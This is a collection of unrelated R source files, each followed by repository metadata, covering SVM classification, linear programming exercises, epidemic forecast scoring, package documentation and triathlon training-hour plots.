confusionMatrix(test_pred1, as.factor(test_set$G4))
confusionMatrix(test_pred2, as.factor(test_set$G4))
confusionMatrix(test_pred3, as.factor(test_set$G4))
# The accuracy for both model looks solid...
m2 <- svm(Species~., data = iris)
plot(m2, iris, Petal.Width ~ Petal.Length,
slice = list(Sepal.Width = 3, Sepal.Length = 4))
plot(classifier1, training_set, R_loops ~ GC)
plot(classifier2, training_set, R_loops ~ GC)
iris.part = subset(iris, Species != 'setosa')
iris.part$Species = factor(iris.part$Species)
#iris.part = iris.part[, c(1,2,5)]
svm.fit = svm(formula=Species~., data=iris.part, type='C-classification', kernel='linear')
plot(svm.fit, iris.part, Petal.Width ~ Petal.Length, slice = list(Sepal.Width = 3, Sepal.Length = 4))
##### top 100 G4 scores #####
# get all the predicted scores, then get the top 100, and find it's equivalent expression score
load("svmTune.RData")
load("probs_svm.RData")
varImp(object = svmTune)
roc_svm_test <- roc(response = test_set$G4, predictor =as.numeric(svmPred))
plot(roc_svm_test)
plot(varImp(svmTune), col = viridis(19, direction = 1))
#simple_svm <- svm(x = training_set[,1:19],
# y = training_set$G4,
# kernel = "radial",
# cost = 0.25,
# cross = 5,
# probability = TRUE)
svmTune$finalModel
#pretty sure "B" is G4 positive
all_preds_svm <- predict.train(svmTune, type = "prob")
svmPred <- predict(svmTune, test_set[,1:19], type = "prob")
total_preds <- rbind(all_preds_svm, svmPred)
top_100_preds_svm <- S4Vectors::tail(as.data.table(sort(total_preds$B , decreasing = F, index.return = T)), 100)
load("min_g4_positive_names_train.RData")
load("min_g4_negative_names_train.RData")
load("plus_g4_positive_names_train.RData")
load("plus_g4_negative_names_train.RData")
load("min_g4_positive_names_test.RData")
load("min_g4_negative_names_test.RData")
load("plus_g4_positive_names_test.RData")
load("plus_g4_negative_names_test.RData")
x_names <- rbind(min_g4_positive_names_train, min_g4_negative_names_train,
plus_g4_positive_names_train, plus_g4_negative_names_train,
min_g4_positive_names_test, min_g4_negative_names_test,
plus_g4_positive_names_test, plus_g4_negative_names_test)
top_100_names_svm <- x_names[top_100_preds_svm$ix]
save(top_100_names_svm, file = "top_100_names_svm.RData")
|
#' Calculate standard error, standard deviation, and confidence interval
#' Steal from Cookbook for R
#'
#' @param data data.frame you want to calculate
#' @param measurevar colname you want to measure
#' @param groupvars A list of variables you want to use to group the data, those will also be kept in the output
#' @param na.rm Whether remove NAs or not
#' @param conf.interval Confidence interval of final ci column
#' @return A new data.frame with columns: groupvars, measurevar, counts of each group, sd, se, and ci
#' @export
summarySE <- function(data=NULL, measurevar, groupvars=NULL, na.rm=FALSE, conf.interval=.95) {
require(doBy)
# New version of length which can handle NA's: if na.rm==T, don't count them
length2 <- function (x, na.rm=FALSE) {
if (na.rm) sum(!is.na(x))
else length(x)
}
# Collapse the data
formula <- as.formula(paste(measurevar, paste(groupvars, collapse=" + "), sep=" ~ "))
datac <- summaryBy(formula, data=data, FUN=c(length2,mean,sd), na.rm=na.rm)
# Rename columns
names(datac)[ names(datac) == paste(measurevar, ".mean", sep="") ] <- measurevar
names(datac)[ names(datac) == paste(measurevar, ".sd", sep="") ] <- "sd"
names(datac)[ names(datac) == paste(measurevar, ".length2", sep="") ] <- "N"
datac$se <- datac$sd / sqrt(datac$N) # Calculate standard error of the mean
# Confidence interval multiplier for standard error
# Calculate t-statistic for confidence interval:
# e.g., if conf.interval is .95, use .975 (above/below), and use df=N-1
ciMult <- qt(conf.interval/2 + .5, datac$N-1)
datac$ci <- datac$se * ciMult
return(datac)
}
| /R/summarySE.R | permissive | bxshi/rdsg | R | false | false | 1,652 | r | #' Calculate standard error, standard deviation, and confidence interval
#' Steal from Cookbook for R
#'
#' @param data data.frame you want to calculate
#' @param measurevar colname you want to measure
#' @param groupvars A list of variables you want to use to group the data, those will also be kept in the output
#' @param na.rm Whether remove NAs or not
#' @param conf.interval Confidence interval of final ci column
#' @return A new data.frame with columns: groupvars, measurevar, counts of each group, sd, se, and ci
#' @export
summarySE <- function(data=NULL, measurevar, groupvars=NULL, na.rm=FALSE, conf.interval=.95) {
require(doBy)
# New version of length which can handle NA's: if na.rm==T, don't count them
length2 <- function (x, na.rm=FALSE) {
if (na.rm) sum(!is.na(x))
else length(x)
}
# Collapse the data
formula <- as.formula(paste(measurevar, paste(groupvars, collapse=" + "), sep=" ~ "))
datac <- summaryBy(formula, data=data, FUN=c(length2,mean,sd), na.rm=na.rm)
# Rename columns
names(datac)[ names(datac) == paste(measurevar, ".mean", sep="") ] <- measurevar
names(datac)[ names(datac) == paste(measurevar, ".sd", sep="") ] <- "sd"
names(datac)[ names(datac) == paste(measurevar, ".length2", sep="") ] <- "N"
datac$se <- datac$sd / sqrt(datac$N) # Calculate standard error of the mean
# Confidence interval multiplier for standard error
# Calculate t-statistic for confidence interval:
# e.g., if conf.interval is .95, use .975 (above/below), and use df=N-1
ciMult <- qt(conf.interval/2 + .5, datac$N-1)
datac$ci <- datac$se * ciMult
return(datac)
}
|
#-------------Question 2------------------#
library(lpSolveAPI)
Y <- make.lp(0, 9)
lp.control(Y, sense= "maximize")
set.objfn(Y, c(25, 10, 5, 21, 6, 1, 25, 10, 5))
add.constraint(Y, c(1,1,1,0,0,0,0,0,0), "<=", 4800)
add.constraint(Y, c(0,0,0,1,1,1,0,0,0), "<=", 3000)
add.constraint(Y, c(0,0,0,0,0,0,1,1,1), "<=", 3500)
add.constraint(Y, c(0.45,-0.55,-0.55,0,0,0,0,0,0),">=",0)
add.constraint(Y, c(-0.3,0.7,-0.3,0,0,0,0,0,0),">=",0)
add.constraint(Y, c(0,0,0,0.55,-0.45,-0.45,0,0,0),">=",0)
add.constraint(Y, c(0,0,0,-0.4,0.6,-0.4,0,0,0),">=",0)
add.constraint(Y, c(0,0,0,0,0,0,0.7,-0.3,-0.3),">=",0)
add.constraint(Y, c(0,0,0,0,0,0,-0.5,0.5,-0.5),">=",0)
#LINEAR PROGRAMMING model Results:
Row_Names <- c("R1", "R2", "R3", "R4", "R5", "R6", "R7", "R8", "R9")
Col_Names <- c("C1", "C2", "C3", "C4", "C5", "C6", "C7", "C8", "C9")
dimnames(Y) <- list(Row_Names, Col_Names)
solve(Y)
get.objective(Y)
get.variables(Y)
get.constraints(Y)
#---------question 3------------#
#player 1
model_LP <- make.lp(0, 8)
lp.control(model_LP, sense= "maximize")
set.objfn(model_LP, c(0,0,0,0,0,0,0,1))
add.constraint(model_LP, c(-1,-2,-1,0,-1,-2,-1,1), "<=", 0)
add.constraint(model_LP, c(0,-1,-2,-2,-2,-1,0,1), "<=", 0)
add.constraint(model_LP, c(0,0,-2,-4,-2,0,0,1), "<=", 0)
add.constraint(model_LP, c(0,-1,-2,-2,-2,1,0,1), "<=", 0)
add.constraint(model_LP, c(-1,-2,-1,0,-1,-2,-1,1), "<=", 0)
add.constraint(model_LP, c(1,1,1,1,1,1,1,0), "=", 1)
set.bounds(model_LP, lower = c(0, 0, 0,0,0,0,0, -Inf))
Row_Names <- c("R1", "R2", "R3", "R4", "R5", "R6")
Col_Names <- c("C1", "C2", "C3", "C4", "C5", "C6", "C7","v")
dimnames(model_LP) <- list(Row_Names, Col_Names)
solve(model_LP)
model_LP
get.objective(model_LP)
get.variables(model_LP)
get.constraints(model_LP)
# For Player2
x <- make.lp(0, 6)
lp.control(x, sense= "minimize")
set.objfn(x, c(0, 0, 0,0,0, 1))
add.constraint(x, c(-1, 0,0,0,-1, 1), ">=",0)
add.constraint(x, c(-2, -1,0,-1,-2, 1), ">=",0)
add.constraint(x, c(-1, -2,-2,-2,-1, 1), ">=",0)
add.constraint(x, c(0, -2,-4,-2,0, 1), ">=",0)
add.constraint(x, c(-1, -2,-2,-2,-1, 1), ">=",0)
add.constraint(x, c(-2, -1,0,-1,-2, 1), ">=",0)
add.constraint(x, c(-1, 0,0,0,-1, 1), ">=",0)
add.constraint(x, c(1,1,1,1,1,0), "=", 1)
set.bounds(x, lower = c(0, 0, 0,0,0, -Inf))
Row_Names <- c("R1", "R2", "R3", "R4", "R5", "R6", "R7", "R8")
Col_Names <- c("c1", "c2", "c3", "c4", "c5","v")
dimnames(x) <- list(Row_Names, Col_Names)
solve(x)
x
get.objective(x)
get.variables(x)
get.constraints(x)
| /Model prediction.R | no_license | naveen96c/R-Programming | R | false | false | 2,501 | r | #-------------Question 2------------------#
library(lpSolveAPI)
Y <- make.lp(0, 9)
lp.control(Y, sense= "maximize")
set.objfn(Y, c(25, 10, 5, 21, 6, 1, 25, 10, 5))
add.constraint(Y, c(1,1,1,0,0,0,0,0,0), "<=", 4800)
add.constraint(Y, c(0,0,0,1,1,1,0,0,0), "<=", 3000)
add.constraint(Y, c(0,0,0,0,0,0,1,1,1), "<=", 3500)
add.constraint(Y, c(0.45,-0.55,-0.55,0,0,0,0,0,0),">=",0)
add.constraint(Y, c(-0.3,0.7,-0.3,0,0,0,0,0,0),">=",0)
add.constraint(Y, c(0,0,0,0.55,-0.45,-0.45,0,0,0),">=",0)
add.constraint(Y, c(0,0,0,-0.4,0.6,-0.4,0,0,0),">=",0)
add.constraint(Y, c(0,0,0,0,0,0,0.7,-0.3,-0.3),">=",0)
add.constraint(Y, c(0,0,0,0,0,0,-0.5,0.5,-0.5),">=",0)
#LINEAR PROGRAMMING model Results:
Row_Names <- c("R1", "R2", "R3", "R4", "R5", "R6", "R7", "R8", "R9")
Col_Names <- c("C1", "C2", "C3", "C4", "C5", "C6", "C7", "C8", "C9")
dimnames(Y) <- list(Row_Names, Col_Names)
solve(Y)
get.objective(Y)
get.variables(Y)
get.constraints(Y)
#---------question 3------------#
#player 1
model_LP <- make.lp(0, 8)
lp.control(model_LP, sense= "maximize")
set.objfn(model_LP, c(0,0,0,0,0,0,0,1))
add.constraint(model_LP, c(-1,-2,-1,0,-1,-2,-1,1), "<=", 0)
add.constraint(model_LP, c(0,-1,-2,-2,-2,-1,0,1), "<=", 0)
add.constraint(model_LP, c(0,0,-2,-4,-2,0,0,1), "<=", 0)
add.constraint(model_LP, c(0,-1,-2,-2,-2,1,0,1), "<=", 0)
add.constraint(model_LP, c(-1,-2,-1,0,-1,-2,-1,1), "<=", 0)
add.constraint(model_LP, c(1,1,1,1,1,1,1,0), "=", 1)
set.bounds(model_LP, lower = c(0, 0, 0,0,0,0,0, -Inf))
Row_Names <- c("R1", "R2", "R3", "R4", "R5", "R6")
Col_Names <- c("C1", "C2", "C3", "C4", "C5", "C6", "C7","v")
dimnames(model_LP) <- list(Row_Names, Col_Names)
solve(model_LP)
model_LP
get.objective(model_LP)
get.variables(model_LP)
get.constraints(model_LP)
# For Player2
x <- make.lp(0, 6)
lp.control(x, sense= "minimize")
set.objfn(x, c(0, 0, 0,0,0, 1))
add.constraint(x, c(-1, 0,0,0,-1, 1), ">=",0)
add.constraint(x, c(-2, -1,0,-1,-2, 1), ">=",0)
add.constraint(x, c(-1, -2,-2,-2,-1, 1), ">=",0)
add.constraint(x, c(0, -2,-4,-2,0, 1), ">=",0)
add.constraint(x, c(-1, -2,-2,-2,-1, 1), ">=",0)
add.constraint(x, c(-2, -1,0,-1,-2, 1), ">=",0)
add.constraint(x, c(-1, 0,0,0,-1, 1), ">=",0)
add.constraint(x, c(1,1,1,1,1,0), "=", 1)
set.bounds(x, lower = c(0, 0, 0,0,0, -Inf))
Row_Names <- c("R1", "R2", "R3", "R4", "R5", "R6", "R7", "R8")
Col_Names <- c("c1", "c2", "c3", "c4", "c5","v")
dimnames(x) <- list(Row_Names, Col_Names)
solve(x)
x
get.objective(x)
get.variables(x)
get.constraints(x)
|
library(xRing)
### Name: print
### Title: Print xRing Objects
### Aliases: print print.xRing print print.xRingList
### ** Examples
data(PaPiRaw)
data(PaPiSpan)
PaPi <- detectRings(PaPiRaw, PaPiSpan)
class(PaPi)
print(PaPi$AFO1001a)
PaPi$AFO1001a
PaPi$AFO1001a[]
print(PaPi)
PaPi
| /data/genthat_extracted_code/xRing/examples/print.Rd.R | no_license | surayaaramli/typeRrh | R | false | false | 299 | r | library(xRing)
### Name: print
### Title: Print xRing Objects
### Aliases: print print.xRing print print.xRingList
### ** Examples
data(PaPiRaw)
data(PaPiSpan)
PaPi <- detectRings(PaPiRaw, PaPiSpan)
class(PaPi)
print(PaPi$AFO1001a)
PaPi$AFO1001a
PaPi$AFO1001a[]
print(PaPi)
PaPi
|
% Generated by roxygen2 (4.1.0): do not edit by hand
% Please edit documentation in R/crm.wrapper.R
\name{crm.wrapper}
\alias{create.model.list}
\alias{crm.wrapper}
\alias{crmlist_fromfiles}
\alias{load.model}
\alias{model.table}
\alias{rerun_crm}
\title{Automation of model runs}
\usage{
crm.wrapper(model.list,data,ddl=NULL,models=NULL,base="",
external=TRUE,run=TRUE,env=NULL,...)
create.model.list(parameters)
model.table(model.list)
load.model(x)
crmlist_fromfiles(filenames=NULL)
rerun_crm(data,ddl,model.list,method=NULL,modelnums=NULL,initial=NULL,...)
}
\arguments{
\item{model.list}{matrix of model names contained in the environment of models function; each row is a model and each column is for a parameter and the value is formula name}
\item{data}{Either the raw data which is a dataframe with at least one
column named ch (a character field containing the capture history) or a
processed dataframe. For rerun_crm this should be the processed dataframe}
\item{ddl}{Design data list which contains a list element for each parameter
type; if NULL it is created; For rerun_crm, must be the same ddl as used with original run can cannot be NULL}
\item{models}{a function with a defined environment with model specifications as variables; values of model.list are some or all of those variables}
\item{base}{base value for model names}
\item{external}{if TRUE, model results are stored externally; otherwise they are stored in crmlist}
\item{run}{if TRUE, fit models; otherwise just create dml to test if model data are correct for formula}
\item{env}{environment to find model specifications if not parent.frame}
\item{...}{aditional arguments passed to crm; for rerun_crm can be used to set hessian=TRUE for specific models after they have been run}
\item{parameters}{character vector of parameter names}
\item{x}{filename of externally stored model}
\item{method}{vector of methods to use for optimization if different that previous run in rerun_crm}
\item{modelnums}{model numbers to be re-run instead of those that did not covnerge}
\item{initial}{either a fitted crm model or the model number in model.list to use for starting values}
\item{filenames}{for non-Windows machine, vector of filenames for external files must be specifed in crmlist_fromfiles including .rda extension}
}
\value{
create.model.list returns a matrix for crm.wrapper; crm.wrapper runs and stores models externally and retrurns a list of model results
and a model selection table; load.model returns model object that is stored externally
}
\description{
Some functions that help automate running a set of crm models based on parameter
specifications.
}
\details{
create.model.list creates all combinations of model specifications for the specified
set of parameters. In the calling environment it looks for objects named parameter.xxxxxx where xxxxxx can
be anything. It creates a matrix with a column for each parameter and as many rows
needed to create all combinations. This can be used as input to crm.wrapper.
crm.wrapper runs a sequence of crm models by constructing the call with the arguments
and the parameter specifications. The parameter specifications can either be in the
local environment or in the environment of the named function models. The advantage of the
latter is that it is self-contained such that sets of parameter specifications can
be selected without possibility of being over-written or accidentally changed whereas
with the former the set must be identified via a script and any in the environment will
be used which requires removing/recreating the set to be used.
}
\author{
Jeff Laake
}
\seealso{
\code{\link{crm}}
}
\keyword{models}
| /marked/man/crm.wrapper.Rd | no_license | bmcclintock/marked | R | false | false | 3,821 | rd | % Generated by roxygen2 (4.1.0): do not edit by hand
% Please edit documentation in R/crm.wrapper.R
\name{crm.wrapper}
\alias{create.model.list}
\alias{crm.wrapper}
\alias{crmlist_fromfiles}
\alias{load.model}
\alias{model.table}
\alias{rerun_crm}
\title{Automation of model runs}
\usage{
crm.wrapper(model.list,data,ddl=NULL,models=NULL,base="",
external=TRUE,run=TRUE,env=NULL,...)
create.model.list(parameters)
model.table(model.list)
load.model(x)
crmlist_fromfiles(filenames=NULL)
rerun_crm(data,ddl,model.list,method=NULL,modelnums=NULL,initial=NULL,...)
}
\arguments{
\item{model.list}{matrix of model names contained in the environment of models function; each row is a model and each column is for a parameter and the value is formula name}
\item{data}{Either the raw data which is a dataframe with at least one
column named ch (a character field containing the capture history) or a
processed dataframe. For rerun_crm this should be the processed dataframe}
\item{ddl}{Design data list which contains a list element for each parameter
type; if NULL it is created; For rerun_crm, must be the same ddl as used with original run can cannot be NULL}
\item{models}{a function with a defined environment with model specifications as variables; values of model.list are some or all of those variables}
\item{base}{base value for model names}
\item{external}{if TRUE, model results are stored externally; otherwise they are stored in crmlist}
\item{run}{if TRUE, fit models; otherwise just create dml to test if model data are correct for formula}
\item{env}{environment to find model specifications if not parent.frame}
\item{...}{aditional arguments passed to crm; for rerun_crm can be used to set hessian=TRUE for specific models after they have been run}
\item{parameters}{character vector of parameter names}
\item{x}{filename of externally stored model}
\item{method}{vector of methods to use for optimization if different that previous run in rerun_crm}
\item{modelnums}{model numbers to be re-run instead of those that did not covnerge}
\item{initial}{either a fitted crm model or the model number in model.list to use for starting values}
\item{filenames}{for non-Windows machine, vector of filenames for external files must be specifed in crmlist_fromfiles including .rda extension}
}
\value{
create.model.list returns a matrix for crm.wrapper; crm.wrapper runs and stores models externally and retrurns a list of model results
and a model selection table; load.model returns model object that is stored externally
}
\description{
Some functions that help automate running a set of crm models based on parameter
specifications.
}
\details{
create.model.list creates all combinations of model specifications for the specified
set of parameters. In the calling environment it looks for objects named parameter.xxxxxx where xxxxxx can
be anything. It creates a matrix with a column for each parameter and as many rows
needed to create all combinations. This can be used as input to crm.wrapper.
crm.wrapper runs a sequence of crm models by constructing the call with the arguments
and the parameter specifications. The parameter specifications can either be in the
local environment or in the environment of the named function models. The advantage of the
latter is that it is self-contained such that sets of parameter specifications can
be selected without possibility of being over-written or accidentally changed whereas
with the former the set must be identified via a script and any in the environment will
be used which requires removing/recreating the set to be used.
}
\author{
Jeff Laake
}
\seealso{
\code{\link{crm}}
}
\keyword{models}
|
#' Score a case forecast
#'
#' @param pred_cases Dataframe of predicted cases with the following variables: `sample`, `date`,
#' `cases` and forecast horizon. As produced by `forecast_cases`.
#' @param obs_cases Dataframe of observed cases with the following variables: `date` and `cases`.
#' @return A dataframe containing the following scores per forecast timepoint: dss, crps,
#' logs, bias, and sharpness as well as the forecast date and time horizon.
#' @export
#'
#' @inheritParams score_forecast
#' @importFrom dplyr rename
#' @examples
#' ## Fit a model (using a subset of observations)
#' samples <- forecast_rt(EpiSoon::example_obs_rts[1:10, ],
#' model = function(...) {EpiSoon::bsts_model(model =
#' function(ss, y){bsts::AddSemilocalLinearTrend(ss, y = y)}, ...)},
#' horizon = 7, samples = 10)
#'
#' pred_cases <- forecast_cases(EpiSoon::example_obs_cases,
#' samples, EpiSoon::example_serial_interval)
#'
#' ## Score the model fit (with observations during the time horizon of the forecast)
#' score_case_forecast(pred_cases, EpiSoon::example_obs_cases)
#'
#'
#' ## Score the model fit (with observations during the time horizon of the forecast)
#' score_case_forecast(pred_cases, EpiSoon::example_obs_cases, scores = c("crps", "sharpness", "bias"))
score_case_forecast <- function(pred_cases, obs_cases, scores = "all") {
pred_cases <- dplyr::rename(pred_cases, rt = cases)
obs_cases <- dplyr::rename(obs_cases, rt = cases)
scores <- EpiSoon::score_forecast(pred_cases, obs_cases,
scores = scores)
return(scores)
}
| /R/score_case_forecast.R | permissive | medewitt/EpiSoon | R | false | false | 1,674 | r |
#' Score a case forecast
#'
#' @param pred_cases Dataframe of predicted cases with the following variables: `sample`, `date`,
#' `cases` and forecast horizon. As produced by `forecast_cases`.
#' @param obs_cases Dataframe of observed cases with the following variables: `date` and `cases`.
#' @return A dataframe containing the following scores per forecast timepoint: dss, crps,
#' logs, bias, and sharpness as well as the forecast date and time horizon.
#' @export
#'
#' @inheritParams score_forecast
#' @importFrom dplyr rename
#' @examples
#' ## Fit a model (using a subset of observations)
#' samples <- forecast_rt(EpiSoon::example_obs_rts[1:10, ],
#' model = function(...) {EpiSoon::bsts_model(model =
#' function(ss, y){bsts::AddSemilocalLinearTrend(ss, y = y)}, ...)},
#' horizon = 7, samples = 10)
#'
#' pred_cases <- forecast_cases(EpiSoon::example_obs_cases,
#' samples, EpiSoon::example_serial_interval)
#'
#' ## Score the model fit (with observations during the time horizon of the forecast)
#' score_case_forecast(pred_cases, EpiSoon::example_obs_cases)
#'
#'
#' ## Score the model fit (with observations during the time horizon of the forecast)
#' score_case_forecast(pred_cases, EpiSoon::example_obs_cases, scores = c("crps", "sharpness", "bias"))
score_case_forecast <- function(pred_cases, obs_cases, scores = "all") {
pred_cases <- dplyr::rename(pred_cases, rt = cases)
obs_cases <- dplyr::rename(obs_cases, rt = cases)
scores <- EpiSoon::score_forecast(pred_cases, obs_cases,
scores = scores)
return(scores)
}
|
library(data.table)
library(lubridate)
library(data.table)
library(ggplot2)
train.data <- data.table(read.csv("./training_data.csv"))
train.data[,
`:=`(Swim=as.POSIXct(Swim,format="%T"),
Bike=as.POSIXct(Bike,format="%T"),
Run=as.POSIXct(Run,format="%T"),
Total=as.POSIXct(Total,format="%T"))]
train.data[,
`:=`(swim_time=hour(Swim)+minute(Swim)/60,
bike_time=hour(Bike)+minute(Bike)/60,
run_time=hour(Run)+minute(Run)/60,
total_time=hour(Total)+minute(Total)/60)]
### Remove TP
train.data <- train.data[!is.na(Week)]
levels(train.data$Program)[levels(train.data$Program) %in% c("TrainingPeaks","","TTB-600ATP")] <- NA
train.data <- train.data[!is.na(Program)]
train.data[,race_week:=max(Week)-Week,Program]
p <- ggplot(train.data,aes(x=-race_week,y=total_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Weekly IM Training") +
ylab("Weekly Total Training (SBR) Hours") +
xlab("Weeks Until IM") +
scale_x_continuous(breaks=seq(-40,0,by=5),
labels=seq(40,0,by=-5)) +
scale_y_continuous(breaks=seq(0,21,by=3),
labels=seq(0,21,by=3),
limits=c(3,21))
ggsave("./figures/latest/gr_tot_sbr_time_to_im.png",plot=p)
print(p)
train.data[,`:=`(c_total_time=cumsum(total_time),
c_swim_time=cumsum(swim_time),
c_bike_time=cumsum(bike_time),
c_run_time=cumsum(run_time)),Program]
p <- ggplot(train.data,aes(x=-race_week,y=c_total_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Cumulative IM Training") +
ylab("Cumulative Training (SBR) Hours") +
xlab("Weeks Until IM") +
scale_x_continuous(breaks=seq(-40,0,by=5),
labels=seq(40,0,by=-5)) +
scale_y_continuous(breaks=seq(0,475,by=25),
labels=seq(0,475,by=25)) +
theme(legend.position = "top")
ggsave("./figures/latest/gr_c_tot_sbr_time_to_im.png",plot=p)
print(p)
## add prep phase for rest of year
atp.data <- train.data[,list(race_week = 0:51),Program]
atp.data <- merge(atp.data,train.data[,list(total_time),by=c("Program","race_week")],by=c("Program","race_week"),all=TRUE)
atp.data[is.na(total_time),total_time:=7]
atp.data <- atp.data[order(-race_week)]
atp.data[,`:=`(c_total_time=cumsum(total_time)),Program]
p <- ggplot(atp.data,aes(x=-race_week,y=c_total_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Cumulative IM Training") +
ylab("Cumulative Training (SBR) Hours") +
xlab("Weeks Until IM") +
scale_x_continuous(breaks=seq(-51,0,by=5),
labels=seq(51,0,by=-5)) +
scale_y_continuous(breaks=seq(0,600,by=25),
labels=seq(0,600,by=25)) +
theme(legend.position = "top")
ggsave("./figures/latest/gr_atp_c_tot_sbr_time_to_im.png",plot=p)
print(p)
train.data[,`:=`(run_frac=c_run_time/c_total_time,
bike_frac=c_bike_time/c_total_time,
swim_frac=c_swim_time/c_total_time),
Program]
frac.data <- melt(train.data[,list(race_week,run_frac,bike_frac,swim_frac),Program],id.vars = c('race_week','Program'))
avg.data <- frac.data[,list(avg_frac = mean(value),race_week=mean(race_week+1)),by=c("Program","variable")]
avg.data$variable <- ordered(avg.data$variable)
avg.data <- avg.data[order(variable)]
avg.data[,pos_frac := cumsum(avg_frac)-(avg_frac/3),Program]
p <- ggplot(frac.data,aes(x=-race_week,y=value,fill=variable)) +
geom_bar(stat='identity',position='stack') +
theme_bw() +
facet_wrap(~Program) +
geom_text(data=avg.data,aes(y=pos_frac,label=paste0(round(100*avg_frac,digits=1),"%")),size=10) +
theme(legend.position = "top") +
ylab("") +
xlab("Weeks Until IM")
ggsave("./figures/latest/gr_fractional_sbr_vs_program.png",plot=p)
print(p)
browser();browser();
## Swimming
p <- ggplot(train.data,aes(x=-race_week,y=swim_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Swim Hours") +
ylab("Weekly Swim Hours")
print(p)
p <- ggplot(train.data,aes(x=-race_week,y=c_swim_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Cumulative Swim Hours") +
ylab("Cumulative Swim Hours")
print(p)
## Bike
p <- ggplot(train.data,aes(x=-race_week,y=bike_time,color=Program)) + geom_line() +
geom_point() +
ggtitle("Bike Hours") +
theme_bw() +
ylab("Weekly Bike Hours")
print(p)
p <- ggplot(train.data,aes(x=-race_week,y=c_bike_time,color=Program)) + geom_line() +
geom_point() +
ggtitle("Cumulative Bike Hours") +
theme_bw() +
ylab("Cumulative Bike Hours")
print(p)
## Run
p <- ggplot(train.data,aes(x=-race_week,y=run_time,color=Program)) + geom_line() +
geom_point() +
ggtitle("Run Hours") +
theme_bw() +
ylab("Weekly Run Hours")
print(p)
p <- ggplot(train.data,aes(x=-race_week,y=c_run_time,color=Program)) + geom_line() +
geom_point() +
ggtitle("Cumulative Run Hours") +
theme_bw() +
ylab("Cumulative Run Hours")
print(p)
| /global.R | no_license | ericlwilliams/im_training | R | false | false | 5,922 | r | library(data.table)
library(lubridate)
library(data.table)
library(ggplot2)
train.data <- data.table(read.csv("./training_data.csv"))
train.data[,
`:=`(Swim=as.POSIXct(Swim,format="%T"),
Bike=as.POSIXct(Bike,format="%T"),
Run=as.POSIXct(Run,format="%T"),
Total=as.POSIXct(Total,format="%T"))]
train.data[,
`:=`(swim_time=hour(Swim)+minute(Swim)/60,
bike_time=hour(Bike)+minute(Bike)/60,
run_time=hour(Run)+minute(Run)/60,
total_time=hour(Total)+minute(Total)/60)]
### Remove TP
train.data <- train.data[!is.na(Week)]
levels(train.data$Program)[levels(train.data$Program) %in% c("TrainingPeaks","","TTB-600ATP")] <- NA
train.data <- train.data[!is.na(Program)]
train.data[,race_week:=max(Week)-Week,Program]
p <- ggplot(train.data,aes(x=-race_week,y=total_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Weekly IM Training") +
ylab("Weekly Total Training (SBR) Hours") +
xlab("Weeks Until IM") +
scale_x_continuous(breaks=seq(-40,0,by=5),
labels=seq(40,0,by=-5)) +
scale_y_continuous(breaks=seq(0,21,by=3),
labels=seq(0,21,by=3),
limits=c(3,21))
ggsave("./figures/latest/gr_tot_sbr_time_to_im.png",plot=p)
print(p)
train.data[,`:=`(c_total_time=cumsum(total_time),
c_swim_time=cumsum(swim_time),
c_bike_time=cumsum(bike_time),
c_run_time=cumsum(run_time)),Program]
p <- ggplot(train.data,aes(x=-race_week,y=c_total_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Cumulative IM Training") +
ylab("Cumulative Training (SBR) Hours") +
xlab("Weeks Until IM") +
scale_x_continuous(breaks=seq(-40,0,by=5),
labels=seq(40,0,by=-5)) +
scale_y_continuous(breaks=seq(0,475,by=25),
labels=seq(0,475,by=25)) +
theme(legend.position = "top")
ggsave("./figures/latest/gr_c_tot_sbr_time_to_im.png",plot=p)
print(p)
## add prep phase for rest of year
atp.data <- train.data[,list(race_week = 0:51),Program]
atp.data <- merge(atp.data,train.data[,list(total_time),by=c("Program","race_week")],by=c("Program","race_week"),all=TRUE)
atp.data[is.na(total_time),total_time:=7]
atp.data <- atp.data[order(-race_week)]
atp.data[,`:=`(c_total_time=cumsum(total_time)),Program]
p <- ggplot(atp.data,aes(x=-race_week,y=c_total_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Cumulative IM Training") +
ylab("Cumulative Training (SBR) Hours") +
xlab("Weeks Until IM") +
scale_x_continuous(breaks=seq(-51,0,by=5),
labels=seq(51,0,by=-5)) +
scale_y_continuous(breaks=seq(0,600,by=25),
labels=seq(0,600,by=25)) +
theme(legend.position = "top")
ggsave("./figures/latest/gr_atp_c_tot_sbr_time_to_im.png",plot=p)
print(p)
train.data[,`:=`(run_frac=c_run_time/c_total_time,
bike_frac=c_bike_time/c_total_time,
swim_frac=c_swim_time/c_total_time),
Program]
frac.data <- melt(train.data[,list(race_week,run_frac,bike_frac,swim_frac),Program],id.vars = c('race_week','Program'))
avg.data <- frac.data[,list(avg_frac = mean(value),race_week=mean(race_week+1)),by=c("Program","variable")]
avg.data$variable <- ordered(avg.data$variable)
avg.data <- avg.data[order(variable)]
avg.data[,pos_frac := cumsum(avg_frac)-(avg_frac/3),Program]
p <- ggplot(frac.data,aes(x=-race_week,y=value,fill=variable)) +
geom_bar(stat='identity',position='stack') +
theme_bw() +
facet_wrap(~Program) +
geom_text(data=avg.data,aes(y=pos_frac,label=paste0(round(100*avg_frac,digits=1),"%")),size=10) +
theme(legend.position = "top") +
ylab("") +
xlab("Weeks Until IM")
ggsave("./figures/latest/gr_fractional_sbr_vs_program.png",plot=p)
print(p)
browser();browser();
## Swimming
p <- ggplot(train.data,aes(x=-race_week,y=swim_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Swim Hours") +
ylab("Weekly Swim Hours")
print(p)
p <- ggplot(train.data,aes(x=-race_week,y=c_swim_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Cumulative Swim Hours") +
ylab("Cumulative Swim Hours")
print(p)
## Bike
p <- ggplot(train.data,aes(x=-race_week,y=bike_time,color=Program)) + geom_line() +
geom_point() +
ggtitle("Bike Hours") +
theme_bw() +
ylab("Weekly Bike Hours")
print(p)
p <- ggplot(train.data,aes(x=-race_week,y=c_bike_time,color=Program)) + geom_line() +
geom_point() +
ggtitle("Cumulative Bike Hours") +
theme_bw() +
ylab("Cumulative Bike Hours")
print(p)
## Run
p <- ggplot(train.data,aes(x=-race_week,y=run_time,color=Program)) + geom_line() +
geom_point() +
